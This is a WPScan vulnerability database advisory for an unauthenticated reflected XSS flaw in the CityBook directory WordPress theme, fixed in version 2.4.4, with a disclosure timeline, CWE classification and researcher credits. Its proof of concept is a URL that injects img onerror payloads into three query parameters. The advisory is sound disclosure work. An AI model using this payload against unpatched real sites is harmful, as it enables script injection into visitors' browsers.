CityBook < 2.4.4 - Unauthenticated Reflected XSS



Description
Unauthenticated Reflected XSS vulnerability was discovered in the «CityBook - Directory & Listing WordPress Theme», tested version — v2.4.3.

Edit (WPScanTeam)
June 17th, 2020 - Confirmed & Escalated to Envato
June 18th, 2020 - v2.4.4 released, fixing the issue
Proof of Concept
https://example.com/?search_term=&distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS2`)%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS3`)%3E&lcats[]=47

Affects Theme

fixed in version 2.4.4

References

URL https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Vlad Vector
Submitter VLΛD VΞCTOR
Submitter Website https://vladvector.ru
Submitter Twitter vlad_vector
Views 667
Verified Yes
WPVDB ID 10275

Timeline

Publicly Published 2020-06-19 (20 days ago)
Added 2020-06-19 (20 days ago)
Last Updated 2020-06-20 (19 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin